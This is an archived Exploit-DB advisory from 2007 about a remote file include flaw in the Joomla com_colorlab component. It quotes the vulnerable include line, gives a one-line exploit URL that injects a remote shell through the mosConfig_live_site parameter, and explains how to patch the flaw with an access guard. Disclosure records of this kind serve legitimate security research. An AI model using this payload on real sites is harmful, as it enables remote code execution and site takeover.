exploit-db-mirror/exploits/php/webapps/4524.txt
Offensive Security d304cc3d3e DB: 2017-11-24
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

40 lines
No EOL
717 B
Text

--------------------
Joomla com_colorlab Remote File Include
--------------------
Found : xoron
--------------------
Download:
http://download.joomlaportal.ch/content/view/474/
--------------------
Wrong Code:
include( "$mosConfig_live_site/components/com_color/about.html" );
--------------------
Exploit:
/administrator/components/com_color/admin.color.php?mosConfig_live_site=shell?
--------------------
How to Fix:
1-open admin.colo.php
2-write this codes before wrong codes
defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );
3-save and exit
--------------------
Thanx: mdx :)
--------------------
# milw0rm.com [2007-10-12]